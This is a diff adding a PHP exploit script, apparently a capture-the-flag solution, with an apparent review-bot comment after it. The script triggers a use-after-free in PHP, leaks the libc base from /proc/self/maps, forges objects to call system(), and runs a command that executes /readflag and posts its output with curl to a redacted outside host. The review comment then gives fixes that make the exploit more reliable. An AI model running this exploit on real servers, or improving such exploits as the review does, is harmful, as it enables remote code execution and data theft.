| 1 | +<?php |
| 2 | +pwn("uname -a"); |
| 3 | + |
| 4 | +function pwn($cmd) { |
| 5 | + global $abc, $helper, $backtrace; |
| 6 | + |
| 7 | + class Vuln { |
| 8 | + public $a; |
| 9 | + public function __destruct() { |
| 10 | + global $backtrace; |
| 11 | + unset($this->a); |
| 12 | + $backtrace = (new Exception)->getTrace(); # ;) |
| 13 | + if(!isset($backtrace[1]['args'])) { # PHP >= 7.4 |
| 14 | + $backtrace = debug_backtrace(); |
| 15 | + } |
| 16 | + } |
| 17 | + } |
| 18 | + |
| 19 | + class Helper { |
| 20 | + public $a, $b, $c, $d; |
| 21 | + } |
| 22 | + |
| 23 | + function str2ptr(&$str, $p = 0, $s = 8) { |
| 24 | + $address = 0; |
| 25 | + $j = $s-1; |
| 26 | + |
| 27 | + $address <<= 8; |
| 28 | + $address |= ord($str[$p+$j]);$j--; |
| 29 | + $address <<= 8; |
| 30 | + $address |= ord($str[$p+$j]);$j--; |
| 31 | + $address <<= 8; |
| 32 | + $address |= ord($str[$p+$j]);$j--; |
| 33 | + $address <<= 8; |
| 34 | + $address |= ord($str[$p+$j]);$j--; |
| 35 | + $address <<= 8; |
| 36 | + $address |= ord($str[$p+$j]);$j--; |
| 37 | + $address <<= 8; |
| 38 | + $address |= ord($str[$p+$j]);$j--; |
| 39 | + $address <<= 8; |
| 40 | + $address |= ord($str[$p+$j]);$j--; |
| 41 | + $address <<= 8; |
| 42 | + $address |= ord($str[$p+$j]);$j--; |
| 43 | + return $address; |
| 44 | + } |
| 45 | + |
| 46 | + |
| 47 | + function write(&$str, $p, $v, $n = 8) { |
| 48 | + $i = 0; |
| 49 | + $str[$p + $i] = chr($v & 0xff); |
| 50 | + $v >>= 8; $i++; |
| 51 | + $str[$p + $i] = chr($v & 0xff); |
| 52 | + $v >>= 8; $i++; |
| 53 | + $str[$p + $i] = chr($v & 0xff); |
| 54 | + $v >>= 8; $i++; |
| 55 | + $str[$p + $i] = chr($v & 0xff); |
| 56 | + $v >>= 8; $i++; |
| 57 | + $str[$p + $i] = chr($v & 0xff); |
| 58 | + $v >>= 8; $i++; |
| 59 | + $str[$p + $i] = chr($v & 0xff); |
| 60 | + $v >>= 8; $i++; |
| 61 | + $str[$p + $i] = chr($v & 0xff); |
| 62 | + $v >>= 8; $i++; |
| 63 | + $str[$p + $i] = chr($v & 0xff); |
| 64 | + $v >>= 8; $i++; |
| 65 | + } |
| 66 | + |
| 67 | + |
| 68 | + |
| 69 | + function trigger_uaf($arg) { |
| 70 | + # str_shuffle prevents opcache string interning |
| 71 | + $arg = str_shuffle(str_repeat('A', 79)); |
| 72 | + echo("sice..."); |
| 73 | + $vuln = new Vuln(); |
| 74 | + $vuln->a = $arg; |
| 75 | + echo("assigned reference"); |
| 76 | + } |
| 77 | + |
| 78 | + |
| 79 | + $hax= file_get_contents('/proc/self/maps'); |
| 80 | + $lol = strpos($hax, "/lib/x86_64-linux-gnu/libc-2.28.so"); |
| 81 | + $libc_base = hexdec(explode("-",explode("\n", substr($hax, $lol-100))[1])[0]); |
| 82 | + $system_ptr = $libc_base + 0x449c0; |
| 83 | + |
| 84 | + $n_alloc = 20; # increase this value if UAF fails |
| 85 | + $contiguous = []; |
| 86 | + |
| 87 | + $contiguous[] = str_shuffle(str_repeat('A', 79)); |
| 88 | + $contiguous[] = str_shuffle(str_repeat('A', 79)); |
| 89 | + $contiguous[] = str_shuffle(str_repeat('A', 79)); |
| 90 | + $contiguous[] = str_shuffle(str_repeat('A', 79)); |
| 91 | + $contiguous[] = str_shuffle(str_repeat('A', 79)); |
| 92 | + $contiguous[] = str_shuffle(str_repeat('A', 79)); |
| 93 | + $contiguous[] = str_shuffle(str_repeat('A', 79)); |
| 94 | + $contiguous[] = str_shuffle(str_repeat('A', 79)); |
| 95 | + $contiguous[] = str_shuffle(str_repeat('A', 79)); |
| 96 | + $contiguous[] = str_shuffle(str_repeat('A', 79)); |
| 97 | + $contiguous[] = str_shuffle(str_repeat('A', 79)); |
| 98 | + $contiguous[] = str_shuffle(str_repeat('A', 79)); |
| 99 | + $contiguous[] = str_shuffle(str_repeat('A', 79)); |
| 100 | + $contiguous[] = str_shuffle(str_repeat('A', 79)); |
| 101 | + $contiguous[] = str_shuffle(str_repeat('A', 79)); |
| 102 | + $contiguous[] = str_shuffle(str_repeat('A', 79)); |
| 103 | + $contiguous[] = str_shuffle(str_repeat('A', 79)); |
| 104 | + $contiguous[] = str_shuffle(str_repeat('A', 79)); |
| 105 | + |
| 106 | + echo("hello"); |
| 107 | + file_put_contents("/tmp/lelel2", "hacked"); |
| 108 | + trigger_uaf('x'); |
| 109 | + $abc = $backtrace[1]['args'][0]; |
| 110 | + |
| 111 | + $helper = new Helper; |
| 112 | + $helper->b = function ($x) { }; |
| 113 | + echo("we're alive"); |
| 114 | + |
| 115 | + |
| 116 | + # fake value |
| 117 | + write($abc, 0x60, 2); |
| 118 | + write($abc, 0x70, 6); |
| 119 | + |
| 120 | + # fake reference |
| 121 | + write($abc, 0x10, 0x44444444); |
| 122 | + write($abc, 0x18, 0xa); |
| 123 | + echo("SICE!\n"); |
| 124 | + $closure_obj = str2ptr($abc, 0x20); |
| 125 | + $binsh = strpos($abc,"/bin/sh",0xbf0000+20*0x20000); |
| 126 | + $base = $binsh - 0x181519; |
| 127 | + $freeh = $base + 1825000; |
| 128 | + file_put_contents("/tmp/leakfd7", substr($abc, $binsh, 8)); |
| 129 | + file_put_contents("/tmp/leakfd",strval($binsh)."\n"); |
| 130 | + file_put_contents("/tmp/leakfd8",substr($abc,$base,10)); |
| 131 | + echo("hm...\n"); |
| 132 | + $fake_obj_offset = $freeh; |
| 133 | + write($abc, $fake_obj_offset, $system_ptr); |
| 134 | + |
| 135 | + $a = ";/readflag > /tmp/sicemehackerman; curl -X POST http://REDACTED/ -d \"@/tmp/sicemehackerman\";#"; |
| 136 | + try{ |
| 137 | + $_SERVER['DEET'] = $a(); |
| 138 | +}catch(Exception $e){ |
| 139 | + echo("exception"); |
| 140 | +} |
| 141 | + echo("we should've crashed"); |
| 142 | + write($abc, 0x41414141, 0xdeadbeef); |
| 143 | + ($helper->b)($cmd); |
| 144 | + exit(); |
| 145 | +} |
| 146 | + |
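Review bot: The `strpos` results at gutter lines 81 and 126 (`$lol`, `$binsh`) are never checked for `false`, so on a target that does not map `/lib/x86_64-linux-gnu/libc-2.28.so` or has no `/bin/sh` past the search offset, the arithmetic proceeds on `false` (coerced to 0: `$lol - 100` becomes `-100`, `$base` is derived from 0) and the `write()` at line 133 lands on a garbage offset rather than the intended slot. Guard both lookups before using them: `if ($lol === false) { die("libc-2.28 not found in /proc/self/maps\n"); }` and `if ($binsh === false) { die("/bin/sh not found in leaked memory\n"); }`. The build-specific constants (`0x449c0`, `0x181519`, `1825000`) deserve a comment stating which libc/PHP build they were taken from, and `$n_alloc = 20` at line 84 is assigned but never read — the spray is unrolled to 18 pushes — so the `# increase this value if UAF fails` comment is misleading as written. Separately, `catch(Exception $e)` at line 138 will not catch the `\Error` that an undefined-function call raises in PHP 7+, so if the hijacked call does not take over, the script aborts before reaching line 141; use `catch (\Throwable $e)` if falling through to the second attempt is intended.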